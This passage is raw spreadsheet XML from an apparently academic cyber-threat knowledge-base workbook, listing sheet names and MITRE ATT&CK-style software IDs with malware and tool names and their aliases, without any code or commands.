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E:\学校\课程\大四下\毕设\资料\d2\da\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{8E0180FF-82F0-495C-94A0-1CCCD8A30BC0}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12456" tabRatio="905" firstSheet="1" activeTab="6" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="网络攻击" sheetId="1" r:id="rId1"/>
    <sheet name="ATT&amp;CK" sheetId="22" r:id="rId2"/>
    <sheet name="渗透流程" sheetId="23" r:id="rId3"/>
    <sheet name="工具1" sheetId="25" r:id="rId4"/>
    <sheet name="漏洞检测" sheetId="26" r:id="rId5"/>
    <sheet name="渗透攻击" sheetId="27" r:id="rId6"/>
    <sheet name="后渗透" sheetId="28" r:id="rId7"/>
    <sheet name="渗透分类" sheetId="24" r:id="rId8"/>
    <sheet name="网络威胁行为体" sheetId="2" r:id="rId9"/>
    <sheet name="数据源" sheetId="4" r:id="rId10"/>
    <sheet name="数据源组成" sheetId="13" r:id="rId11"/>
    <sheet name="组织" sheetId="11" r:id="rId12"/>
    <sheet name="文献" sheetId="5" r:id="rId13"/>
    <sheet name="工具" sheetId="6" r:id="rId14"/>
    <sheet name="技术种类" sheetId="12" r:id="rId15"/>
    <sheet name="技术" sheetId="14" r:id="rId16"/>
    <sheet name="包含1（网络攻击、技术）" sheetId="3" r:id="rId17"/>
    <sheet name="包含2（网络攻击、工具）" sheetId="7" r:id="rId18"/>
    <sheet name="包含3（工具、技术）" sheetId="9" r:id="rId19"/>
    <sheet name="包含4（工具、文献）" sheetId="8" r:id="rId20"/>
    <sheet name="包含5（工具、组织）" sheetId="10" r:id="rId21"/>
    <sheet name="包含6（组织、工具）" sheetId="21" r:id="rId22"/>
    <sheet name="包含7（组织、技术）" sheetId="20" r:id="rId23"/>
    <sheet name="包含8（组织、文献）" sheetId="19" r:id="rId24"/>
    <sheet name="包含9（数据源、数据源组成）" sheetId="18" r:id="rId25"/>
    <sheet name="包含10（数据源、文献）" sheetId="17" r:id="rId26"/>
    <sheet name="包含11（数据源组成、技术）" sheetId="16" r:id="rId27"/>
    <sheet name="包含12（技术种类、技术）" sheetId="15"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="13009" uniqueCount="10790">
  <si>
    <t>业余黑客</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>黑产组织</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络犯罪团伙或黑客组织</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络恐怖组织</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一般能力国家/地区行为体</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>高级能力国家/地区行为体</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>超高级能力国家/地区行为体</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>s_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>g_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>d_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>t_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>dc_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>to_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>r_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ca_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cta_id</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>r_id</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>DS0026</t>
  </si>
  <si>
    <t>Azure AD, Windows</t>
  </si>
  <si>
    <t>Cloud Control Plane, Host</t>
  </si>
  <si>
    <t>DS0015</t>
  </si>
  <si>
    <t>S0066</t>
  </si>
  <si>
    <t>S0065</t>
  </si>
  <si>
    <t>4H RAT</t>
  </si>
  <si>
    <t>S0469</t>
  </si>
  <si>
    <t>ABK</t>
  </si>
  <si>
    <t>S0202</t>
  </si>
  <si>
    <t>adbupd</t>
  </si>
  <si>
    <t>S0552</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>S0309</t>
  </si>
  <si>
    <t>Adups</t>
  </si>
  <si>
    <t>S0045</t>
  </si>
  <si>
    <t>ADVSTORESHELL</t>
  </si>
  <si>
    <t>AZZY, EVILTOSS, NETUI, Sedreco</t>
  </si>
  <si>
    <t>S0440</t>
  </si>
  <si>
    <t>S0331</t>
  </si>
  <si>
    <t>S0092</t>
  </si>
  <si>
    <t>S0319</t>
  </si>
  <si>
    <t>Allwinner</t>
  </si>
  <si>
    <t>S0504</t>
  </si>
  <si>
    <t>Anchor</t>
  </si>
  <si>
    <t>Anchor_DNS</t>
  </si>
  <si>
    <t>S0525</t>
  </si>
  <si>
    <t>Android/AdDisplay.Ashas</t>
  </si>
  <si>
    <t>S0304</t>
  </si>
  <si>
    <t>Android/Chuli.A</t>
  </si>
  <si>
    <t>S0524</t>
  </si>
  <si>
    <t>AndroidOS/MalLocker.B</t>
  </si>
  <si>
    <t>S0310</t>
  </si>
  <si>
    <t>ANDROIDOS_ANSERVER.A</t>
  </si>
  <si>
    <t>S0292</t>
  </si>
  <si>
    <t>AndroRAT</t>
  </si>
  <si>
    <t>S0422</t>
  </si>
  <si>
    <t>Anubis</t>
  </si>
  <si>
    <t>S0584</t>
  </si>
  <si>
    <t>AppleJeus</t>
  </si>
  <si>
    <t>S0622</t>
  </si>
  <si>
    <t>AppleSeed</t>
  </si>
  <si>
    <t>S0456</t>
  </si>
  <si>
    <t>S0099</t>
  </si>
  <si>
    <t>Arp</t>
  </si>
  <si>
    <t>Aria-body</t>
  </si>
  <si>
    <t>arp.exe</t>
  </si>
  <si>
    <t>S0540</t>
  </si>
  <si>
    <t>Asacub</t>
  </si>
  <si>
    <t>Trojan-SMS.AndroidOS.Smaps</t>
  </si>
  <si>
    <t>S0073</t>
  </si>
  <si>
    <t>ASPXSpy</t>
  </si>
  <si>
    <t>ASPXTool</t>
  </si>
  <si>
    <t>S0373</t>
  </si>
  <si>
    <t>Astaroth</t>
  </si>
  <si>
    <t>Guildma</t>
  </si>
  <si>
    <t>S0110</t>
  </si>
  <si>
    <t>at</t>
  </si>
  <si>
    <t>at.exe</t>
  </si>
  <si>
    <t>S0438</t>
  </si>
  <si>
    <t>Attor</t>
  </si>
  <si>
    <t>S0347</t>
  </si>
  <si>
    <t>AuditCred</t>
  </si>
  <si>
    <t>Roptimizer</t>
  </si>
  <si>
    <t>S0129</t>
  </si>
  <si>
    <t>AutoIt backdoor</t>
  </si>
  <si>
    <t>S0640</t>
  </si>
  <si>
    <t>Avaddon</t>
  </si>
  <si>
    <t>S0473</t>
  </si>
  <si>
    <t>S0344</t>
  </si>
  <si>
    <t>Azorult</t>
  </si>
  <si>
    <t>S0638</t>
  </si>
  <si>
    <t>Babuk</t>
  </si>
  <si>
    <t>Babyk, Vasa Locker</t>
  </si>
  <si>
    <t>S0414</t>
  </si>
  <si>
    <t>BabyShark</t>
  </si>
  <si>
    <t>S0475</t>
  </si>
  <si>
    <t>BackConfig</t>
  </si>
  <si>
    <t>S0093</t>
  </si>
  <si>
    <t>Havex</t>
  </si>
  <si>
    <t>S0031</t>
  </si>
  <si>
    <t>BACKSPACE</t>
  </si>
  <si>
    <t>Lecna</t>
  </si>
  <si>
    <t>S0606</t>
  </si>
  <si>
    <t>Bad Rabbit</t>
  </si>
  <si>
    <t>Win32/Diskcoder.D</t>
  </si>
  <si>
    <t>S0245</t>
  </si>
  <si>
    <t>BADCALL</t>
  </si>
  <si>
    <t>S0642</t>
  </si>
  <si>
    <t>BADFLICK</t>
  </si>
  <si>
    <t>S0128</t>
  </si>
  <si>
    <t>S0337</t>
  </si>
  <si>
    <t>BadPatch</t>
  </si>
  <si>
    <t>S0234</t>
  </si>
  <si>
    <t>S0239</t>
  </si>
  <si>
    <t>Bankshot</t>
  </si>
  <si>
    <t>Trojan Manuscript</t>
  </si>
  <si>
    <t>S0534</t>
  </si>
  <si>
    <t>Bazar</t>
  </si>
  <si>
    <t>KEGTAP, Team9</t>
  </si>
  <si>
    <t>S0470</t>
  </si>
  <si>
    <t>BBK</t>
  </si>
  <si>
    <t>S0127</t>
  </si>
  <si>
    <t>BBSRAT</t>
  </si>
  <si>
    <t>S0574</t>
  </si>
  <si>
    <t>BendyBear</t>
  </si>
  <si>
    <t>S0017</t>
  </si>
  <si>
    <t>S0268</t>
  </si>
  <si>
    <t>Bisonal</t>
  </si>
  <si>
    <t>S0570</t>
  </si>
  <si>
    <t>BitPaymer</t>
  </si>
  <si>
    <t>wp_encrypt, FriedEx</t>
  </si>
  <si>
    <t>S0190</t>
  </si>
  <si>
    <t>BITSAdmin</t>
  </si>
  <si>
    <t>S0069</t>
  </si>
  <si>
    <t>BLACKCOFFEE</t>
  </si>
  <si>
    <t>S0089</t>
  </si>
  <si>
    <t>BlackEnergy</t>
  </si>
  <si>
    <t>Black Energy</t>
  </si>
  <si>
    <t>S0564</t>
  </si>
  <si>
    <t>BlackMould</t>
  </si>
  <si>
    <t>S0520</t>
  </si>
  <si>
    <t>BLINDINGCAN</t>
  </si>
  <si>
    <t>S0521</t>
  </si>
  <si>
    <t>S0657</t>
  </si>
  <si>
    <t>S0486</t>
  </si>
  <si>
    <t>Bonadan</t>
  </si>
  <si>
    <t>S0360</t>
  </si>
  <si>
    <t>BONDUPDATER</t>
  </si>
  <si>
    <t>S0635</t>
  </si>
  <si>
    <t>BoomBox</t>
  </si>
  <si>
    <t>S0415</t>
  </si>
  <si>
    <t>BOOSTWRITE</t>
  </si>
  <si>
    <t>S0114</t>
  </si>
  <si>
    <t>BOOTRASH</t>
  </si>
  <si>
    <t>S0651</t>
  </si>
  <si>
    <t>BoxCaon</t>
  </si>
  <si>
    <t>S0293</t>
  </si>
  <si>
    <t>BrainTest</t>
  </si>
  <si>
    <t>S0252</t>
  </si>
  <si>
    <t>S0432</t>
  </si>
  <si>
    <t>Bread</t>
  </si>
  <si>
    <t>Joker</t>
  </si>
  <si>
    <t>S0204</t>
  </si>
  <si>
    <t>Briba</t>
  </si>
  <si>
    <t>S0014</t>
  </si>
  <si>
    <t>BS2005</t>
  </si>
  <si>
    <t>S0043</t>
  </si>
  <si>
    <t>BUBBLEWRAP</t>
  </si>
  <si>
    <t>Backdoor.APT.FakeWinHTTPHelper</t>
  </si>
  <si>
    <t>S0471</t>
  </si>
  <si>
    <t>build_downer</t>
  </si>
  <si>
    <t>S0482</t>
  </si>
  <si>
    <t>Bundlore</t>
  </si>
  <si>
    <t>OSX.Bundlore</t>
  </si>
  <si>
    <t>S0655</t>
  </si>
  <si>
    <t>BusyGasper</t>
  </si>
  <si>
    <t>S0119</t>
  </si>
  <si>
    <t>Cachedump</t>
  </si>
  <si>
    <t>S0454</t>
  </si>
  <si>
    <t>Cadelspy</t>
  </si>
  <si>
    <t>S0025</t>
  </si>
  <si>
    <t>CALENDAR</t>
  </si>
  <si>
    <t>S0274</t>
  </si>
  <si>
    <t>Calisto</t>
  </si>
  <si>
    <t>S0077</t>
  </si>
  <si>
    <t>CallMe</t>
  </si>
  <si>
    <t>S0351</t>
  </si>
  <si>
    <t>Cannon</t>
  </si>
  <si>
    <t>S0030</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>Anunak</t>
  </si>
  <si>
    <t>S0484</t>
  </si>
  <si>
    <t>Carberp</t>
  </si>
  <si>
    <t>S0335</t>
  </si>
  <si>
    <t>S0529</t>
  </si>
  <si>
    <t>CarbonSteal</t>
  </si>
  <si>
    <t>S0348</t>
  </si>
  <si>
    <t>Cardinal RAT</t>
  </si>
  <si>
    <t>S0465</t>
  </si>
  <si>
    <t>CARROTBALL</t>
  </si>
  <si>
    <t>S0462</t>
  </si>
  <si>
    <t>CARROTBAT</t>
  </si>
  <si>
    <t>S0261</t>
  </si>
  <si>
    <t>Catchamas</t>
  </si>
  <si>
    <t>S0572</t>
  </si>
  <si>
    <t>Caterpillar WebShell</t>
  </si>
  <si>
    <t>S0222</t>
  </si>
  <si>
    <t>CCBkdr</t>
  </si>
  <si>
    <t>S0480</t>
  </si>
  <si>
    <t>Cerberus</t>
  </si>
  <si>
    <t>S0160</t>
  </si>
  <si>
    <t>certutil</t>
  </si>
  <si>
    <t>certutil.exe</t>
  </si>
  <si>
    <t>S0631</t>
  </si>
  <si>
    <t>Chaes</t>
  </si>
  <si>
    <t>S0220</t>
  </si>
  <si>
    <t>Chaos</t>
  </si>
  <si>
    <t>S0323</t>
  </si>
  <si>
    <t>Charger</t>
  </si>
  <si>
    <t>S0144</t>
  </si>
  <si>
    <t>ChChes</t>
  </si>
  <si>
    <t>Scorpion, HAYMAKER</t>
  </si>
  <si>
    <t>S0555</t>
  </si>
  <si>
    <t>CHEMISTGAMES</t>
  </si>
  <si>
    <t>S0107</t>
  </si>
  <si>
    <t>Cherry Picker</t>
  </si>
  <si>
    <t>S0020</t>
  </si>
  <si>
    <t>China Chopper</t>
  </si>
  <si>
    <t>S0023</t>
  </si>
  <si>
    <t>CHOPSTICK</t>
  </si>
  <si>
    <t>Backdoor.SofacyX, SPLM, Xagent, X-Agent, webhp</t>
  </si>
  <si>
    <t>S0602</t>
  </si>
  <si>
    <t>S0611</t>
  </si>
  <si>
    <t>Clop</t>
  </si>
  <si>
    <t>S0054</t>
  </si>
  <si>
    <t>CloudDuke</t>
  </si>
  <si>
    <t>MiniDionis, CloudLook</t>
  </si>
  <si>
    <t>cmd.exe</t>
  </si>
  <si>
    <t>S0154</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>S0338</t>
  </si>
  <si>
    <t>Cobian RAT</t>
  </si>
  <si>
    <t>S0369</t>
  </si>
  <si>
    <t>CoinTicker</t>
  </si>
  <si>
    <t>S0244</t>
  </si>
  <si>
    <t>Comnie</t>
  </si>
  <si>
    <t>S0126</t>
  </si>
  <si>
    <t>ComRAT</t>
  </si>
  <si>
    <t>S0426</t>
  </si>
  <si>
    <t>Concipit1248</t>
  </si>
  <si>
    <t>Corona Updates</t>
  </si>
  <si>
    <t>S0608</t>
  </si>
  <si>
    <t>Conficker</t>
  </si>
  <si>
    <t>Kido, Downadup</t>
  </si>
  <si>
    <t>S0591</t>
  </si>
  <si>
    <t>ConnectWise</t>
  </si>
  <si>
    <t>ScreenConnect</t>
  </si>
  <si>
    <t>S0575</t>
  </si>
  <si>
    <t>Conti</t>
  </si>
  <si>
    <t>S0492</t>
  </si>
  <si>
    <t>CookieMiner</t>
  </si>
  <si>
    <t>S0212</t>
  </si>
  <si>
    <t>CORALDECK</t>
  </si>
  <si>
    <t>S0137</t>
  </si>
  <si>
    <t>CORESHELL</t>
  </si>
  <si>
    <t>Sofacy, SOURFACE</t>
  </si>
  <si>
    <t>S0425</t>
  </si>
  <si>
    <t>Wabi Music, Concipit1248</t>
  </si>
  <si>
    <t>S0050</t>
  </si>
  <si>
    <t>CosmicDuke</t>
  </si>
  <si>
    <t>TinyBaron, BotgenStudios, NemesisGemina</t>
  </si>
  <si>
    <t>S0614</t>
  </si>
  <si>
    <t>CostaBricks</t>
  </si>
  <si>
    <t>S0046</t>
  </si>
  <si>
    <t>CozyCar</t>
  </si>
  <si>
    <t>CozyDuke, CozyBear, Cozer, EuroAPT</t>
  </si>
  <si>
    <t>S0488</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>S0115</t>
  </si>
  <si>
    <t>Crimson</t>
  </si>
  <si>
    <t>MSIL/Crimson</t>
  </si>
  <si>
    <t>S0235</t>
  </si>
  <si>
    <t>CrossRAT</t>
  </si>
  <si>
    <t>S0538</t>
  </si>
  <si>
    <t>Crutch</t>
  </si>
  <si>
    <t>S0498</t>
  </si>
  <si>
    <t>Cryptoistic</t>
  </si>
  <si>
    <t>S0527</t>
  </si>
  <si>
    <t>CSPY Downloader</t>
  </si>
  <si>
    <t>S0625</t>
  </si>
  <si>
    <t>S0497</t>
  </si>
  <si>
    <t>Dacls</t>
  </si>
  <si>
    <t>S0334</t>
  </si>
  <si>
    <t>DarkComet</t>
  </si>
  <si>
    <t>DarkKomet, Fynloski, Krademok, FYNLOS</t>
  </si>
  <si>
    <t>S0187</t>
  </si>
  <si>
    <t>Daserf</t>
  </si>
  <si>
    <t>Muirim, Nioupale</t>
  </si>
  <si>
    <t>S0255</t>
  </si>
  <si>
    <t>DDKONG</t>
  </si>
  <si>
    <t>S0243</t>
  </si>
  <si>
    <t>DealersChoice</t>
  </si>
  <si>
    <t>S0616</t>
  </si>
  <si>
    <t>DEATHRANSOM</t>
  </si>
  <si>
    <t>S0479</t>
  </si>
  <si>
    <t>DEFENSOR ID</t>
  </si>
  <si>
    <t>S0301</t>
  </si>
  <si>
    <t>Dendroid</t>
  </si>
  <si>
    <t>S0354</t>
  </si>
  <si>
    <t>Denis</t>
  </si>
  <si>
    <t>S0021</t>
  </si>
  <si>
    <t>Derusbi</t>
  </si>
  <si>
    <t>PHOTO</t>
  </si>
  <si>
    <t>S0505</t>
  </si>
  <si>
    <t>S0200</t>
  </si>
  <si>
    <t>Dipsind</t>
  </si>
  <si>
    <t>S0213</t>
  </si>
  <si>
    <t>DOGCALL</t>
  </si>
  <si>
    <t>S0281</t>
  </si>
  <si>
    <t>Dok</t>
  </si>
  <si>
    <t>Retefe</t>
  </si>
  <si>
    <t>S0600</t>
  </si>
  <si>
    <t>Doki</t>
  </si>
  <si>
    <t>S0550</t>
  </si>
  <si>
    <t>DoubleAgent</t>
  </si>
  <si>
    <t>S0472</t>
  </si>
  <si>
    <t>down_new</t>
  </si>
  <si>
    <t>S0134</t>
  </si>
  <si>
    <t>Downdelph</t>
  </si>
  <si>
    <t>Delphacy</t>
  </si>
  <si>
    <t>S0186</t>
  </si>
  <si>
    <t>DownPaper</t>
  </si>
  <si>
    <t>S0300</t>
  </si>
  <si>
    <t>DressCode</t>
  </si>
  <si>
    <t>S0384</t>
  </si>
  <si>
    <t>Dridex</t>
  </si>
  <si>
    <t>Bugat v5</t>
  </si>
  <si>
    <t>S0320</t>
  </si>
  <si>
    <t>DroidJack</t>
  </si>
  <si>
    <t>S0547</t>
  </si>
  <si>
    <t>DropBook</t>
  </si>
  <si>
    <t>S0502</t>
  </si>
  <si>
    <t>Drovorub</t>
  </si>
  <si>
    <t>S0105</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>dsquery.exe</t>
  </si>
  <si>
    <t>S0567</t>
  </si>
  <si>
    <t>Dtrack</t>
  </si>
  <si>
    <t>S0315</t>
  </si>
  <si>
    <t>DualToy</t>
  </si>
  <si>
    <t>S0038</t>
  </si>
  <si>
    <t>Duqu</t>
  </si>
  <si>
    <t>S0062</t>
  </si>
  <si>
    <t>DustySky</t>
  </si>
  <si>
    <t>NeD Worm</t>
  </si>
  <si>
    <t>S0420</t>
  </si>
  <si>
    <t>Dvmap</t>
  </si>
  <si>
    <t>S0024</t>
  </si>
  <si>
    <t>Dyre</t>
  </si>
  <si>
    <t>Dyzap, Dyreza</t>
  </si>
  <si>
    <t>S0377</t>
  </si>
  <si>
    <t>Ebury</t>
  </si>
  <si>
    <t>S0593</t>
  </si>
  <si>
    <t>ECCENTRICBANDWAGON</t>
  </si>
  <si>
    <t>S0624</t>
  </si>
  <si>
    <t>Ecipekac</t>
  </si>
  <si>
    <t>HEAVYHAND, SigLoader, DESLoader</t>
  </si>
  <si>
    <t>S0554</t>
  </si>
  <si>
    <t>Egregor</t>
  </si>
  <si>
    <t>S0605</t>
  </si>
  <si>
    <t>EKANS</t>
  </si>
  <si>
    <t>SNAKEHOSE</t>
  </si>
  <si>
    <t>S0081</t>
  </si>
  <si>
    <t>Elise</t>
  </si>
  <si>
    <t>BKDR_ESILE, Page</t>
  </si>
  <si>
    <t>S0064</t>
  </si>
  <si>
    <t>ELMER</t>
  </si>
  <si>
    <t>S0082</t>
  </si>
  <si>
    <t>Emissary</t>
  </si>
  <si>
    <t>S0367</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
    <t>Geodo</t>
  </si>
  <si>
    <t>S0363</t>
  </si>
  <si>
    <t>Empire</t>
  </si>
  <si>
    <t>EmPyre, PowerShell Empire</t>
  </si>
  <si>
    <t>S0634</t>
  </si>
  <si>
    <t>EnvyScout</t>
  </si>
  <si>
    <t>S0091</t>
  </si>
  <si>
    <t>Epic</t>
  </si>
  <si>
    <t>Tavdig, Wipbot, WorldCupSec, TadjMakhal</t>
  </si>
  <si>
    <t>S0404</t>
  </si>
  <si>
    <t>esentutl</t>
  </si>
  <si>
    <t>esentutl.exe</t>
  </si>
  <si>
    <t>S0507</t>
  </si>
  <si>
    <t>eSurv</t>
  </si>
  <si>
    <t>S0478</t>
  </si>
  <si>
    <t>EventBot</t>
  </si>
  <si>
    <t>S0396</t>
  </si>
  <si>
    <t>EvilBunny</t>
  </si>
  <si>
    <t>S0152</t>
  </si>
  <si>
    <t>EvilGrab</t>
  </si>
  <si>
    <t>S0568</t>
  </si>
  <si>
    <t>EVILNUM</t>
  </si>
  <si>
    <t>S0401</t>
  </si>
  <si>
    <t>Exaramel for Linux</t>
  </si>
  <si>
    <t>S0343</t>
  </si>
  <si>
    <t>Exaramel for Windows</t>
  </si>
  <si>
    <t>S0522</t>
  </si>
  <si>
    <t>Exobot</t>
  </si>
  <si>
    <t>Marcher</t>
  </si>
  <si>
    <t>S0405</t>
  </si>
  <si>
    <t>Exodus</t>
  </si>
  <si>
    <t>Exodus One, Exodus Two</t>
  </si>
  <si>
    <t>S0361</t>
  </si>
  <si>
    <t>Expand</t>
  </si>
  <si>
    <t>S0569</t>
  </si>
  <si>
    <t>Explosive</t>
  </si>
  <si>
    <t>S0076</t>
  </si>
  <si>
    <t>FakeM</t>
  </si>
  <si>
    <t>S0509</t>
  </si>
  <si>
    <t>FakeSpy</t>
  </si>
  <si>
    <t>S0181</t>
  </si>
  <si>
    <t>FALLCHILL</t>
  </si>
  <si>
    <t>S0512</t>
  </si>
  <si>
    <t>FatDuke</t>
  </si>
  <si>
    <t>S0171</t>
  </si>
  <si>
    <t>Felismus</t>
  </si>
  <si>
    <t>S0267</t>
  </si>
  <si>
    <t>FELIXROOT</t>
  </si>
  <si>
    <t>GreyEnergy mini</t>
  </si>
  <si>
    <t>S0120</t>
  </si>
  <si>
    <t>Fgdump</t>
  </si>
  <si>
    <t>S0355</t>
  </si>
  <si>
    <t>Final1stspy</t>
  </si>
  <si>
    <t>S0182</t>
  </si>
  <si>
    <t>FinFisher</t>
  </si>
  <si>
    <t>FinSpy</t>
  </si>
  <si>
    <t>S0618</t>
  </si>
  <si>
    <t>FIVEHANDS</t>
  </si>
  <si>
    <t>S0143</t>
  </si>
  <si>
    <t>Flame</t>
  </si>
  <si>
    <t>Flamer, sKyWIper</t>
  </si>
  <si>
    <t>S0036</t>
  </si>
  <si>
    <t>FLASHFLOOD</t>
  </si>
  <si>
    <t>S0381</t>
  </si>
  <si>
    <t>FlawedAmmyy</t>
  </si>
  <si>
    <t>S0383</t>
  </si>
  <si>
    <t>FlawedGrace</t>
  </si>
  <si>
    <t>S0173</t>
  </si>
  <si>
    <t>FLIPSIDE</t>
  </si>
  <si>
    <t>S0193</t>
  </si>
  <si>
    <t>Forfiles</t>
  </si>
  <si>
    <t>S0503</t>
  </si>
  <si>
    <t>FrameworkPOS</t>
  </si>
  <si>
    <t>Trinity</t>
  </si>
  <si>
    <t>S0577</t>
  </si>
  <si>
    <t>FrozenCell</t>
  </si>
  <si>
    <t>S0277</t>
  </si>
  <si>
    <t>S0095</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>ftp.exe</t>
  </si>
  <si>
    <t>S0628</t>
  </si>
  <si>
    <t>FYAnti</t>
  </si>
  <si>
    <t>DILLJUICE stage2</t>
  </si>
  <si>
    <t>S0410</t>
  </si>
  <si>
    <t>Fysbis</t>
  </si>
  <si>
    <t>S0168</t>
  </si>
  <si>
    <t>Gazer</t>
  </si>
  <si>
    <t>WhiteBear</t>
  </si>
  <si>
    <t>S0049</t>
  </si>
  <si>
    <t>GeminiDuke</t>
  </si>
  <si>
    <t>S0460</t>
  </si>
  <si>
    <t>Get2</t>
  </si>
  <si>
    <t>S0032</t>
  </si>
  <si>
    <t>gh0st RAT</t>
  </si>
  <si>
    <t>S0423</t>
  </si>
  <si>
    <t>Ginp</t>
  </si>
  <si>
    <t>S0026</t>
  </si>
  <si>
    <t>GLOOXMAIL</t>
  </si>
  <si>
    <t>Trojan.GTALK</t>
  </si>
  <si>
    <t>S0249</t>
  </si>
  <si>
    <t>S0535</t>
  </si>
  <si>
    <t>Golden Cup</t>
  </si>
  <si>
    <t>S0551</t>
  </si>
  <si>
    <t>GoldenEagle</t>
  </si>
  <si>
    <t>S0493</t>
  </si>
  <si>
    <t>GoldenSpy</t>
  </si>
  <si>
    <t>S0597</t>
  </si>
  <si>
    <t>GoldFinder</t>
  </si>
  <si>
    <t>S0588</t>
  </si>
  <si>
    <t>GoldMax</t>
  </si>
  <si>
    <t>SUNSHUTTLE</t>
  </si>
  <si>
    <t>S0421</t>
  </si>
  <si>
    <t>GolfSpy</t>
  </si>
  <si>
    <t>S0290</t>
  </si>
  <si>
    <t>Gooligan</t>
  </si>
  <si>
    <t>Ghost Push</t>
  </si>
  <si>
    <t>S0477</t>
  </si>
  <si>
    <t>Goopy</t>
  </si>
  <si>
    <t>S0536</t>
  </si>
  <si>
    <t>GPlayed</t>
  </si>
  <si>
    <t>S0531</t>
  </si>
  <si>
    <t>Grandoreiro</t>
  </si>
  <si>
    <t>S0237</t>
  </si>
  <si>
    <t>GravityRAT</t>
  </si>
  <si>
    <t>S0342</t>
  </si>
  <si>
    <t>GreyEnergy</t>
  </si>
  <si>
    <t>S0417</t>
  </si>
  <si>
    <t>GRIFFON</t>
  </si>
  <si>
    <t>S0632</t>
  </si>
  <si>
    <t>GrimAgent</t>
  </si>
  <si>
    <t>S0008</t>
  </si>
  <si>
    <t>gsecdump</t>
  </si>
  <si>
    <t>S0561</t>
  </si>
  <si>
    <t>GuLoader</t>
  </si>
  <si>
    <t>S0406</t>
  </si>
  <si>
    <t>Gustuff</t>
  </si>
  <si>
    <t>S0132</t>
  </si>
  <si>
    <t>H1N1</t>
  </si>
  <si>
    <t>S0047</t>
  </si>
  <si>
    <t>S0151</t>
  </si>
  <si>
    <t>S0037</t>
  </si>
  <si>
    <t>HAMMERTOSS</t>
  </si>
  <si>
    <t>HammerDuke, NetDuke</t>
  </si>
  <si>
    <t>S0499</t>
  </si>
  <si>
    <t>Hancitor</t>
  </si>
  <si>
    <t>Chanitor</t>
  </si>
  <si>
    <t>S0214</t>
  </si>
  <si>
    <t>HAPPYWORK</t>
  </si>
  <si>
    <t>S0246</t>
  </si>
  <si>
    <t>HARDRAIN</t>
  </si>
  <si>
    <t>S0224</t>
  </si>
  <si>
    <t>Havij</t>
  </si>
  <si>
    <t>S0391</t>
  </si>
  <si>
    <t>HAWKBALL</t>
  </si>
  <si>
    <t>S0071</t>
  </si>
  <si>
    <t>hcdLoader</t>
  </si>
  <si>
    <t>S0061</t>
  </si>
  <si>
    <t>HDoor</t>
  </si>
  <si>
    <t>Custom HDoor</t>
  </si>
  <si>
    <t>S0617</t>
  </si>
  <si>
    <t>HELLOKITTY</t>
  </si>
  <si>
    <t>S0170</t>
  </si>
  <si>
    <t>Helminth</t>
  </si>
  <si>
    <t>S0544</t>
  </si>
  <si>
    <t>HenBox</t>
  </si>
  <si>
    <t>S0087</t>
  </si>
  <si>
    <t>Hi-Zor</t>
  </si>
  <si>
    <t>S0394</t>
  </si>
  <si>
    <t>HiddenWasp</t>
  </si>
  <si>
    <t>S0135</t>
  </si>
  <si>
    <t>HIDEDRV</t>
  </si>
  <si>
    <t>S0009</t>
  </si>
  <si>
    <t>Hikit</t>
  </si>
  <si>
    <t>S0601</t>
  </si>
  <si>
    <t>Hildegard</t>
  </si>
  <si>
    <t>S0232</t>
  </si>
  <si>
    <t>HOMEFRY</t>
  </si>
  <si>
    <t>S0376</t>
  </si>
  <si>
    <t>HOPLIGHT</t>
  </si>
  <si>
    <t>S0431</t>
  </si>
  <si>
    <t>HotCroissant</t>
  </si>
  <si>
    <t>S0040</t>
  </si>
  <si>
    <t>HTRAN</t>
  </si>
  <si>
    <t>HUC Packet Transmit Tool</t>
  </si>
  <si>
    <t>S0070</t>
  </si>
  <si>
    <t>HTTPBrowser</t>
  </si>
  <si>
    <t>Token Control, HttpDump</t>
  </si>
  <si>
    <t>S0068</t>
  </si>
  <si>
    <t>httpclient</t>
  </si>
  <si>
    <t>S0322</t>
  </si>
  <si>
    <t>HummingBad</t>
  </si>
  <si>
    <t>S0321</t>
  </si>
  <si>
    <t>HummingWhale</t>
  </si>
  <si>
    <t>S0203</t>
  </si>
  <si>
    <t>Hydraq</t>
  </si>
  <si>
    <t>Aurora, 9002 RAT</t>
  </si>
  <si>
    <t>S0398</t>
  </si>
  <si>
    <t>HyperBro</t>
  </si>
  <si>
    <t>S0537</t>
  </si>
  <si>
    <t>HyperStack</t>
